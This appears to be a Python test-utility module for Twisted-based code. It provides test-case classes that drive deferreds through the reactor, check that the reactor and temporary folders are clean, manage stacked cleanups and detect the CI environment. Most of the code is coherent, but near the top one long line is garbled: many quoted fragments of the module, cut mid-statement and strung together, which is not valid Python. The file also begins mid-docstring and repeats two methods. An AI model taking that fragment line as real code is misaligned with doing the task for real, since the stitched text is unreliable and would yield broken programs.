        one of the `getDeferredFailure` or `getDeferredResult`.

        Run the deferred in the reactor loop.

        Starts the reactor, waits for deferred execution, raises an
        error on timeout, stops the reactor.

        This will do recursive calls, in case the original deferred
        returns another deferred.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            self._runDeferred(deferred)

            self.assertIsNotFailure(deferred)
            self.assertEqual('something', deferred.result)
        """
        if not isinstance(deferred, Deferred):
            raise AssertionError('This is not a deferred.')

        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        try:
            self._initiateTestReactor(timeout=timeout)
            self._executeDeferred(deferred, timeout, debug=debug)
        finally:
            self._shutdownTestReactor(
                prevent_stop=prevent_stop)

    def _executeDeferred(self, deferred, timeout, debug):
        """
        Does the actual deferred execution.
        """
        if not deferred.called:
            deferred_done = False
            while not deferred_done:
                self._iterateTestReactor(debug=debug)
                deferred_done = deferred.called

                if self._timeout_reached:
                    raise AssertionError(
                        'Deferred took more than %d to execute.' % timeout)

        # Check executing all deferreds from chained callbacks.
        result = deferred.result
        while isinstance(result, Deferred):
            self._executeDeferred(result, timeout=timeout, debug=debug)
            result = deferred.result
\"\"\" if not", "self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred and", "more time to execute the stop code. reactor.iterate() # Set", "_reactorQueueToString(self): \"\"\" Return a string representation of all delayed calls", "event to stop waiting for a deferred. _reactor_timeout_call = None", "getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in kilo bytes. \"\"\"", "expected_type, value = value, expected_type if not isinstance(value, expected_type): raise", "_CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', )", "self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements,", "cleanTemporaryFolder(cls): \"\"\" Clean all test files from temporary folder. Return", "current Unix timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\"", "L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect - if provided,", "t2 = 0.1 t = reactor.running and t2 reactor.doIteration(t) else:", "non-Linux this is just the os_name. On Linux is the", "want to stop reactor. reactor.stop() # Let the reactor run", "True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the", "import WMI local_wmi = WMI('.') query = ( u'SELECT PeakWorkingSetSize", "last callback or errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>}", "from twisted.python.failure import Failure except ImportError: # Twisted support is", "thread to exist after test is done. \"\"\" for exception", "with -v or we show the error. \"\"\" class_name =", "%s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None,", "need # to wait at least for delayed calls. if", "can happen if we prevent stop in a previous run.", "u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(),", "# FIXME:924: # Disabled when we can not find the", "provided, and the the exception wrapped by the failure result", "str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if (", "AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname():", "os import platform import socket import sys import time from", "current threads from pool, or empty list when threadpool does", "pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads',", "noqa:cover \"\"\" The short description for the test. bla.bla.tests. is", "in timeout, stops the reactor. This will do recursive calls,", "13 result = [] deferred.addBoth(result.append) if not result: self.fail( \"Failure", "called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the current failure", "that we want to stop reactor. reactor.stop() # Let the", "chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def", "delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None: self._reactor_timeout_failure =", "small value. 
    def executeDelayedCalls(self, timeout=None, debug=False):
        """
        Run the reactor until no more delayed calls are scheduled.

        This will wait for delayed calls to be executed.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT
        self._initiateTestReactor(timeout=timeout)
        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            delayed_calls = reactor.getDelayedCalls()
            try:
                delayed_calls.remove(self._reactor_timeout_call)
            except ValueError:  # noqa:cover
                # Timeout might no longer be there.
                pass
            if not delayed_calls:
                break
        self._shutdownTestReactor(prevent_stop=True)

        if self._reactor_timeout_failure is not None:
            self._reactor_timeout_failure = None
            # We stop the reactor on failures.
            self._shutdownTestReactor()
            raise AssertionError(
                'executeDelayedCalls took more than %s' % (timeout,))

    def executeReactorUntil(
            self, callable, timeout=None, debug=False, prevent_stop=True):
        """
        Run the reactor until `callable` returns a true value.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)

        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            if callable(reactor):
                break

        self._shutdownTestReactor(prevent_stop=prevent_stop)

    def iterateReactor(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor without stopping it.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0), timeout=timeout, debug=debug)

    def iterateReactorWithStop(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor and stop it at the end.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0),
            timeout=timeout,
            debug=debug,
            prevent_stop=False,
            )

    def iterateReactorForSeconds(self, duration=1, debug=False):
        """
        Iterate the reactor for `duration` seconds.
        """
        start = time.time()
        self.executeReactorUntil(
            lambda _: time.time() - start > duration,
            timeout=duration + 0.1,
            debug=debug,
            prevent_stop=False,
            )
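    # Usage sketch, not from the original code: waiting for an external
    # condition via `executeReactorUntil`. `protocol.connected` is a
    # placeholder flag updated by the code under test.
    #
    #   self.executeReactorUntil(
    #       lambda _: protocol.connected, timeout=2)
    #
    # The callable receives the reactor as its single argument and the
    # run stops as soon as it returns a true value.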
    def _getDelayedCallName(self, delayed_call):
        """
        Return a string representation of the delayed call.
        """
        raw_name = text_type(delayed_call.func)
        raw_name = raw_name.replace('<function ', '')
        raw_name = raw_name.replace('<bound method ', '')
        return raw_name.split(' ', 1)[0]

    def getDeferredFailure(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        Run the deferred and return the failure.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            failure = self.getDeferredFailure(deferred)

            self.assertFailureType(AuthenticationError, failure)
        """
        self._runDeferred(
            deferred,
            timeout=timeout,
            debug=debug,
            prevent_stop=prevent_stop,
            )
        self.assertIsFailure(deferred)
        failure = deferred.result
        self.ignoreFailure(deferred)
        return failure

    def successResultOf(self, deferred):
        """
        Return the current success result of C{deferred} or raise
        C{self.failException}.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            which has a success result.
            This means
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            or
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called on it and it has reached the end of its
            callback chain and the last callback or errback returned a
            non-L{failure.Failure}.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has no result or
            has a failure result.

        @return: The result of C{deferred}.
        """
        # FIXME:1370:
        # Remove / re-route this code after upgrading to Twisted 13.
        result = []
        deferred.addBoth(result.append)
        if not result:
            self.fail(
                "Success result expected on %r, found no result instead"
                % (deferred,))
        elif isinstance(result[0], Failure):
            self.fail(
                "Success result expected on %r, "
                "found failure result instead:\n%s" % (
                    deferred, result[0].getBriefTraceback().decode(
                        'utf-8', errors='replace')))
        else:
            return result[0]

    def failureResultOf(self, deferred, *expectedExceptionTypes):
        """
        Return the current failure result of C{deferred} or raise
        C{self.failException}.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            which has a failure result. This means
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            or
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called on it and it has reached the end of its
            callback chain and the last callback or errback returned a
            L{failure.Failure}.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @param expectedExceptionTypes: Exception types to expect - if
            provided, and the exception wrapped by the failure result is
            not one of the types provided, then this test will fail.

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has no result,
            has a success result, or has an unexpected failure result.

        @return: The failure result of C{deferred}.
        @rtype: L{failure.Failure}
        """
        # FIXME:1370:
        # Remove / re-route this code after upgrading to Twisted 13.
        result = []
        deferred.addBoth(result.append)
        if not result:
            self.fail(
                "Failure result expected on %r, found no result instead"
                % (deferred,))
        elif not isinstance(result[0], Failure):
            self.fail(
                "Failure result expected on %r, "
                "found success result (%r) instead" % (deferred, result[0]))
        elif (expectedExceptionTypes and
                not result[0].check(*expectedExceptionTypes)):
            expectedString = " or ".join([
                '.'.join((t.__module__, t.__name__)) for t in
                expectedExceptionTypes])
            self.fail(
                "Failure of type (%s) expected on %r, "
                "found type %r instead: %s" % (
                    expectedString, deferred, result[0].type,
                    result[0].getBriefTraceback().decode(
                        'utf-8', errors='replace')))
        else:
            return result[0]
    def assertNoResult(self, deferred):
        """
        Assert that C{deferred} does not have a result at this point.

        If the assertion succeeds, then the result of C{deferred} is
        left unchanged. Otherwise, any L{failure.Failure} result is
        swallowed.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            without a result.
            This means that neither
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            nor
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called, or that the
            L{Deferred<twisted.internet.defer.Deferred>} is waiting on
            another L{Deferred<twisted.internet.defer.Deferred>} for a
            result.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has a result.
        """
        result = []

        def cb(res):
            result.append(res)
            return res

        deferred.addBoth(cb)
        if result:
            # If there is already a failure, the self.fail below will
            # report it, so swallow it in the deferred.
            deferred.addErrback(lambda _: None)
            self.fail(
                "No result expected on %r, found %r instead" % (
                    deferred, result[0]))

    def getDeferredResult(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        Run the deferred and return the result.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            result = self.getDeferredResult(deferred)

            self.assertEqual('something', result)
        """
        self._runDeferred(
            deferred,
            timeout=timeout,
            debug=debug,
            prevent_stop=prevent_stop,
            )
        self.assertIsNotFailure(deferred)
        return deferred.result

    def assertWasCalled(self, deferred):
        """
        Check that the deferred was called.
        """
        if not deferred.called:
            raise AssertionError('This deferred was not called yet.')

    def ignoreFailure(self, deferred):
        """
        Ignore the current failure on the deferred.

        It transforms a failure into the result `None` so that the
        failure will not be raised at reactor shutdown for not being
        handled.
        """
        deferred.addErrback(lambda failure: None)

    def assertIsFailure(self, deferred):
        """
        Check that the deferred is a failure.
        """
        if not isinstance(deferred.result, Failure):
            raise AssertionError('Deferred is not a failure.')

    def assertIsNotFailure(self, deferred):
        """
        Raise an assertion error if the deferred is a Failure.

        The failed deferred is handled by this method, to avoid
        propagating the error into the reactor.
        """
        self.assertWasCalled(deferred)

        if isinstance(deferred.result, Failure):
            error = deferred.result
            self.ignoreFailure(deferred)
            raise AssertionError(
                'Deferred contains a failure: %s' % (error))
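
# A usage sketch, not part of the original module: a minimal test built
# on TwistedTestCase. `deferLater` and `fail` come from Twisted proper;
# the class and test names are illustrative only.
class _ExampleDeferredTestCase(TwistedTestCase):
    """
    Hypothetical example of driving deferreds through the test reactor.
    """

    def test_success_result(self):
        from twisted.internet.task import deferLater
        deferred = deferLater(reactor, 0.01, lambda: 'something')

        result = self.getDeferredResult(deferred)

        self.assertEqual('something', result)

    def test_failure_result(self):
        from twisted.internet.defer import fail
        deferred = fail(RuntimeError('marker'))

        failure = self.failureResultOf(deferred, RuntimeError)

        self.assertEqual('marker', failure.value.args[0])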

class ChevahTestCase(TwistedTestCase, AssertionMixin):
    """
    Test case for Chevah tests.

    Checks that the temporary folder is clean at exit.
    """

    os_name = process_capabilities.os_name
    os_family = process_capabilities.os_family
    os_version = _get_os_version()
    cpu_type = process_capabilities.cpu_type
    ci_name = _get_ci_name()
    CI = _CI_NAMES
    TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN')

    # List of partial thread names to ignore during the tearDown.
    # No need for the full thread name.
    excepted_threads = [
        'MainThread',
        'threaded_reactor',
        'GlobalPool-WorkerHandler',
        'GlobalPool-TaskHandler',
        'GlobalPool-ResultHandler',
        'PoolThread-twisted.internet.reactor',
        ]

    # We assume that hostname does not change during test and this
    # should save a few DNS lookups.
    hostname = _get_hostname()

    Bunch = Bunch
    Mock = Mock
    #: Obsolete. Please use self.patch and self.patchObject.
    Patch = patch

    _environ_user = None
    _drop_user = '-'

    def setUp(self):
        super(ChevahTestCase, self).setUp()
        self.__cleanup__ = []
        self._cleanup_stack = []
        self._teardown_errors = []
        self.test_segments = None

    def tearDown(self):
        self.callCleanup()
        self._checkTemporaryFiles()
        threads = threading.enumerate()
        if len(threads) > 1:
            for thread in threads:
                thread_name = thread.getName()
                if self._isExceptedThread(thread_name):
                    continue
                self._teardown_errors.append(AssertionError(
                    'There are still active threads, '
                    'beside the main thread: %s - %s' % (
                        thread_name, threads)))

        super(ChevahTestCase, self).tearDown()

        errors, self._teardown_errors = self._teardown_errors, None
        if errors:
            raise AssertionError('Cleanup errors: %s' % (errors,))

    def _isExceptedThread(self, name):
        """
        Return `True` if it is OK for the thread to exist after the test
        is done.
        """
        for exception in self.excepted_threads:
            if name in exception:
                return True
            if exception in name:
                return True
        return False
\"\"\" self._timeout_reached", "case for Twisted specific code. Provides support for running deferred", "deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise AssertionError( 'Deferred", "are in the queues. Set run_once=True to only run the", "second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys", "is_exception = True if not is_exception: # No need to", "deferred and start/stop the reactor during tests. \"\"\" # Number", "reactor shutdown for not being handled. \"\"\" deferred.addErrback(lambda failure: None)", "os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() ==", "to use one of the `getDeferredFailure` or `getDeferredResult`. Usage:: protocol", "_get_hostname() Bunch = Bunch Mock = Mock #: Obsolete. Please", "result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([ '.'.join((t.__module__, t.__name__)) for t", "%s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else:", "is the `nt` followed by the major and minor NT", "code. reactor.iterate() # Set flag to fake a clean reactor.", "very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at", "the deferred. It transforms an failure into result `None` so", "\"\"\" base = platform.processor() if base == 'aarch64': return 'arm64'", "expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected on %r, \"", "'') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true':", "runner. This is only called when we run with -v", "temp folder and return its path and segments, which is", "self.fail( \"Failure result expected on %r, found no result instead\"", "ignoreFailure(self, deferred): \"\"\" Ignore the current failure on the deferred.", "\"\"\" On non-Linux this is just the os_name. On Linux", "Might be canceled from the separate thread. # AttributeError can", "Does the actual deferred execution. \"\"\" if not deferred.called: deferred_done", "\"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments)", "_cleanReactor(cls): \"\"\" Remove all delayed calls, readers and writers from", "use `getDeferredFailure` or `getDeferredResult`. Run the deferred in the reactor", "be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure", "the change to get a \"root\" deferred. In most tests", "# Windows XP reports value in bytes, instead of Kilobytes.", "list of members which were removed. \"\"\" if not mk.fs.exists(folder_segments):", "Chevah tests. Checks that temporary folder is clean at exit.", "in the default temp folder and mark it for cleanup.", "of `expected_type` \"\"\" # In Python 2.7 isInstance is already", "case and removed on #: teardown. CREATE_TEST_USER = None @classmethod", "L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and it", "Patch = patch _environ_user = None _drop_user = '-' def", "if prevent_stop: # Don't continue with stop procedure. return #", "The result of C{deferred}. \"\"\" # FIXME:1370: # Remove /", "has a success result. 
    @classmethod
    def cleanTemporaryFolder(cls):
        """
        Clean all test files from the temporary folder.

        Return a list of members which were removed.
        """
        return cls._cleanFolder(mk.fs.temp_segments)

    @classmethod
    def cleanWorkingFolder(cls):
        path = mk.fs.getAbsoluteRealPath('.')
        segments = mk.fs.getSegmentsFromRealPath(path)
        return cls._cleanFolder(segments, only_marked=True)

    @classmethod
    def _cleanFolder(cls, folder_segments, only_marked=False):
        """
        Clean all test files from folder_segments.

        Return a list of members which were removed.
        """
        if not mk.fs.exists(folder_segments):
            return []

        # In case we are running the test suite as super user,
        # we use the super filesystem for cleaning.
        if cls._environ_user == cls._drop_user:
            temp_avatar = SuperAvatar()
        else:
            temp_avatar = DefaultAvatar()

        temp_filesystem = LocalFilesystem(avatar=temp_avatar)
        temp_members = []
        for member in (temp_filesystem.getFolderContent(folder_segments)):
            if only_marked and member.find(TEST_NAME_MARKER) == -1:
                continue
            temp_members.append(member)
            segments = folder_segments[:]
            segments.append(member)
            if temp_filesystem.isFolder(segments):
                temp_filesystem.deleteFolder(segments, recursive=True)
            else:
                temp_filesystem.deleteFile(segments)

        return temp_members

    @classmethod
    def getPeakMemoryUsage(cls):
        """
        Return maximum memory usage in kilo bytes.
        """
        if cls.os_family == 'posix':
            import resource
            return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        elif cls.os_family == 'nt':
            from wmi import WMI
            local_wmi = WMI('.')

            query = (
                u'SELECT PeakWorkingSetSize '
                u'FROM Win32_Process '
                u'WHERE Handle=%d' % os.getpid())
            result = local_wmi.query(query.encode('utf-8'))
            peak_working_set_size = int(result[0].PeakWorkingSetSize)
            # FIXME:2099:
            # Windows XP reports the value in bytes, instead of
            # kilobytes.
            return int(peak_working_set_size)
        else:
            raise AssertionError('OS not supported.')
    def addCleanup(self, function, *args, **kwargs):
        """
        Overwrite unit-test behaviour to run cleanup methods before
        tearDown.
        """
        self.__cleanup__.append((function, args, kwargs))

    def callCleanup(self):
        """
        Call all cleanup methods.

        If a cleanup fails, the next cleanups will continue to be called
        and the first failure is raised.
        """
        for function, args, kwargs in reversed(self.__cleanup__):
            try:
                function(*args, **kwargs)
            except Exception as error:  # noqa:cover
                self._teardown_errors.append(error)
        self.__cleanup__ = []

    def enterCleanup(self):
        """
        Called when starting to use stacked cleanups.
        """
        self._cleanup_stack.append(self.__cleanup__)
        self.__cleanup__ = []

    def exitCleanup(self):
        """
        To be called at the end of a stacked cleanup.
        """
        self.callCleanup()
        self.__cleanup__ = self._cleanup_stack.pop()

    @contextlib.contextmanager
    def stackedCleanup(self):
        """
        Context manager for stacked cleanups.
        """
        try:
            self.enterCleanup()
            yield
        finally:
            self.exitCleanup()

    def _checkTemporaryFiles(self):
        """
        Check that no temporary files or folders are present.
        """
        # FIXME:922:
        # Move all filesystem checks into a specialized class.
        if self.test_segments:
            if mk.fs.isFolder(self.test_segments):
                mk.fs.deleteFolder(
                    self.test_segments, recursive=True)
            else:
                mk.fs.deleteFile(self.test_segments)

        checks = [
            self.assertTempIsClean,
            self.assertWorkingFolderIsClean,
            ]
        errors = []
        for check in checks:
            try:
                check()
            except AssertionError as error:
                errors.append(error.message)

        if errors:  # noqa:cover
            self._teardown_errors.append(AssertionError(
                'There are temporary files or folders left over.\n %s' % (
                    '\n'.join(errors))))

    def shortDescription(self):  # noqa:cover
        """
        The short description for the test.

        bla.bla.tests. is removed.
        The format is customized for the Chevah Nose runner.
        This is only called when we run with -v or we show the error.
        """
        class_name = text_type(self.__class__)[8:-2]
        class_name = class_name.replace('.Test', ':Test')
        tests_start = class_name.find('.tests.') + 7
        class_name = class_name[tests_start:]

        return "%s - %s.%s" % (
            self._testMethodName,
            class_name,
            self._testMethodName)
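    # Usage sketch, not from the original code: stacked cleanups scope a
    # group of addCleanup() calls so they run when the `with` block exits
    # instead of at tearDown. `make_resource` and `resource` are
    # placeholders.
    #
    #   with self.stackedCleanup():
    #       resource = make_resource()
    #       self.addCleanup(resource.close)
    #       # ... use resource; close() runs when the block exits.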
class TwistedTestCase(TestCase):
    """
    Test case for Twisted specific code.

    Provides support for running deferred and start/stop the reactor
    during tests.
    """

    # Number of seconds to wait for a deferred to have a result.
    DEFERRED_TIMEOUT = 1

    # List of names for delayed calls which should not be considered as
    # required to wait for them when running the reactor.
    EXCEPTED_DELAYED_CALLS = []

    EXCEPTED_READERS = [
        _UnixWaker,
        _SocketWaker,
        _SIGCHLDWaker,
        ]

    # Scheduled timeout call for the waited deferred.
    _reactor_timeout_call = None

    def setUp(self):
        super(TwistedTestCase, self).setUp()
        self._timeout_reached = False
        self._reactor_timeout_failure = None

    @property
    def _caller_success_member(self):
        """
        Retrieve the 'success' member from the test case.
        """
        success_state = None
        # We search starting with second stack, since first stack is the
        # current stack and we don't care about it.
        for level in inspect.stack()[1:]:
            try:
                success_state = level[0].f_locals['success']
                break
            except KeyError:
                success_state = None

        if success_state is None:
            raise AssertionError('Failed to find "success" attribute.')

        return success_state

    def tearDown(self):
        try:
            if self._caller_success_member:
                # Check for a clean reactor at shutdown, only if test
                # passed.
                self.assertIsNone(self._reactor_timeout_failure)
                self._assertReactorIsClean()
        finally:
            self._cleanReactor()
        super(TwistedTestCase, self).tearDown()

    def _reactorQueueToString(self):
        """
        Return a string representation of all delayed calls from reactor
        queue.
        """
        result = []
        for delayed in reactor.getDelayedCalls():  # noqa:cover
            result.append(text_type(delayed.func))
        return '\n'.join(result)

    def _threadPoolQueue(self):
        """
        Return the queue of the thread pool, or [] when the threadpool
        does not exist.

        This is only for cleanup purpose and should not be used by
        normal code, as it removes elements from the Twisted thread
        queue, which will never be called.
        """
        if not reactor.threadpool:
            return []

        result = []
        while len(reactor.threadpool._team._pending):
            result.append(reactor.threadpool._team._pending.pop())
        return result

    def _threadPoolThreads(self):
        """
        Return the threads of the thread pool, or [] when the threadpool
        does not exist.
        """
        if not reactor.threadpool:
            return []
        else:
            return reactor.threadpool.threads

    def _threadPoolWorking(self):
        """
        Return the working threads from the pool, or [] when the
        threadpool does not exist or has no job.
        """
        if not reactor.threadpool:
            return []
        else:
            return reactor.threadpool.working

    @classmethod
    def _cleanReactor(cls):
        """
        Remove all delayed calls, readers and writers from the reactor.

        This should only be called at cleanup as it removes elements
        from the reactor queue.
        """
        if not reactor:
            return

        try:
            reactor.removeAll()
        except (RuntimeError, KeyError):
            # When running threads tests the reactor is touched from the
            # test case itself, which runs in one thread, and from the
            # fixtures/cleanup code which is executed from another
            # thread.
            # removeAll might fail since it detects that internal state
            # is changed from other thread.
            pass

        reactor.threadCallQueue = []
        for delayed_call in reactor.getDelayedCalls():
            try:
                delayed_call.cancel()
            except (ValueError, AttributeError):
                # AlreadyCancelled and AlreadyCalled are ValueError.
                # Might be canceled from the separate thread.
                # AttributeError can occur when we do multi-threading.
                pass
    def _raiseReactorTimeoutError(self, timeout):
        """
        Signal a timeout error while executing the reactor.
        """
        self._timeout_reached = True
        failure = AssertionError(
            'Reactor took more than %.2f seconds to execute.' % timeout)
        self._reactor_timeout_failure = failure

    def _initiateTestReactor(self, timeout):
        """
        Do the steps required to initiate a reactor for testing.
        """
        self._timeout_reached = False

        # Set up timeout.
        self._reactor_timeout_call = reactor.callLater(
            timeout, self._raiseReactorTimeoutError, timeout)

        # Don't start the reactor if it is already started.
        # This can happen if we prevent stop in a previous run.
        if reactor._started:
            return

        reactor._startedBefore = False
        reactor._started = False
        reactor._justStopped = False
        reactor.startRunning()

    def _iterateTestReactor(self, debug=False):
        """
        Iterate the reactor.
        """
        reactor.runUntilCurrent()
        if debug:  # noqa:cover
            # When debug is enabled, iterate using a small delay in
            # steps, to have a much better debug output.
            # Otherwise the debug messages will flood the output.
            print(
                u'delayed: %s\n'
                u'threads: %s\n'
                u'writers: %s\n'
                u'readers: %s\n'
                u'threadpool size: %s\n'
                u'threadpool threads: %s\n'
                u'threadpool working: %s\n'
                u'\n' % (
                    self._reactorQueueToString(),
                    reactor.threadCallQueue,
                    reactor.getWriters(),
                    reactor.getReaders(),
                    reactor.getThreadPool().q.qsize(),
                    self._threadPoolThreads(),
                    self._threadPoolWorking(),
                    )
                )
            t2 = reactor.timeout()
            # For testing we want to force the reactor to wake at an
            # interval of at most 1 second.
            if t2 is None or t2 > 1:
                t2 = 0.1
            t = reactor.running and t2
            reactor.doIteration(t)
        else:
            # FIXME:4428:
            # When not executed in debug mode, some tests fail as they
            # will not spin the reactor.
            # To not slow down all the tests, we run the iteration with
            # a very small value.
            reactor.doIteration(0.000001)

    def _shutdownTestReactor(self, prevent_stop=False):
        """
        Called at the end of a test reactor run.

        When prevent_stop=True, the reactor will not be stopped.
        """
        if not self._timeout_reached:
            # Everything fine, disable timeout.
            if (
                    self._reactor_timeout_call and
                    not self._reactor_timeout_call.cancelled
                    ):
                self._reactor_timeout_call.cancel()

        if prevent_stop:
            # Don't continue with stop procedure.
            return

        # Let the reactor know that we want to stop it.
        reactor.stop()
        # Let the reactor run one more time to execute the stop code.
        reactor.iterate()

        # Set flag to fake a clean reactor.
        reactor._startedBefore = False
        reactor._started = False
        reactor._justStopped = False
        reactor.running = False
        # Start running has consumed the startup events, so we need
        # to restore them.
        reactor.addSystemEventTrigger(
            'during', 'startup', reactor._reallyStartRunning)

    def _assertReactorIsClean(self):
        """
        Check that the reactor has no delayed calls, readers or writers.

        This should only be called at teardown.
        """
        if reactor is None:
            return

        def raise_failure(location, reason):
            raise AssertionError(
                'Reactor is not clean. %s: %s' % (location, reason))

        if reactor._started:  # noqa:cover
            # Reactor was not stopped, so stop it before raising the
            # error.
            self._shutdownTestReactor()
            raise AssertionError('Reactor was not stopped.')

        # Look at threads queue.
        if len(reactor.threadCallQueue) > 0:
            raise_failure('queued threads', reactor.threadCallQueue)

        pool_queue = self._threadPoolQueue()
        if pool_queue:
            raise_failure('threadpool queue', pool_queue)

        if self._threadPoolWorking():
            raise_failure('threadpool working', self._threadPoolWorking())

        if self._threadPoolThreads():
            raise_failure('threadpool threads', self._threadPoolThreads())

        if len(reactor.getWriters()) > 0:  # noqa:cover
            raise_failure('writers', text_type(reactor.getWriters()))

        for reader in reactor.getReaders():
            excepted = False
            for reader_type in self.EXCEPTED_READERS:
                if isinstance(reader, reader_type):
                    excepted = True
                    break
            if not excepted:  # noqa:cover
                raise_failure('readers', text_type(reactor.getReaders()))

        for delayed_call in reactor.getDelayedCalls():
            if delayed_call.active():
                delayed_str = self._getDelayedCallName(delayed_call)
                if delayed_str in self.EXCEPTED_DELAYED_CALLS:
                    continue
                raise_failure('delayed calls', delayed_str)
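    # A minimal sketch of how the low level helpers above cooperate.
    # The loop condition `some_condition` is hypothetical; the public
    # helpers defined below wrap this exact pattern.
    #
    #   self._initiateTestReactor(timeout=2)   # schedule timeout call
    #   while not self._timeout_reached:
    #       self._iterateTestReactor()         # spin one iteration
    #       if some_condition:
    #           break
    #   self._shutdownTestReactor()            # cancel timeout and stop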
    def _runDeferred(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        This is a low level method. In most tests you would like to use
        `getDeferredFailure` or `getDeferredResult`.

        Run the deferred in the reactor loop.

        Starts the reactor, waits for deferred execution, raises error
        in timeout, stops the reactor.

        This will do recursive calls, in case the original deferred
        returns another deferred.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            self._runDeferred(deferred)

            self.assertIsNotFailure(deferred)
            self.assertEqual('something', deferred.result)
        """
        if not isinstance(deferred, Deferred):
            raise AssertionError('This is not a deferred.')

        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        try:
            self._initiateTestReactor(timeout=timeout)
            self._executeDeferred(deferred, timeout, debug=debug)
        finally:
            self._shutdownTestReactor(prevent_stop=prevent_stop)

    def _executeDeferred(self, deferred, timeout, debug):
        """
        Does the actual deferred execution.
        """
        if not deferred.called:
            deferred_done = False
            while not deferred_done:
                self._iterateTestReactor(debug=debug)
                deferred_done = deferred.called

                if self._timeout_reached:
                    raise AssertionError(
                        'Deferred took more than %d seconds '
                        'to execute.' % timeout)

        # Check executing all deferred from chained callbacks.
        result = deferred.result
        while isinstance(result, Deferred):
            self._executeDeferred(result, timeout=timeout, debug=debug)
            result = deferred.result

    def executeReactor(self, timeout=None, debug=False, run_once=False):
        """
        Run the reactor until no more delayed calls, readers or writers
        or threads are in the queues.

        Set run_once=True to only run the reactor once. This is useful
        if you have a persistent deferred which will be removed only at
        the end of the test.

        Only use this for very high level integration code, where you
        don't have the chance to get a "root" deferred.
        In most tests you would like to use one of `getDeferredFailure`
        or `getDeferredResult`.

        Usage::

            protocol = mk.makeFTPProtocol()
            transport = mk.makeStringTransportProtocol()
            protocol.makeConnection(transport)
            transport.protocol = protocol

            protocol.lineReceived('FEAT')
            self.executeReactor()
            result = transport.value()

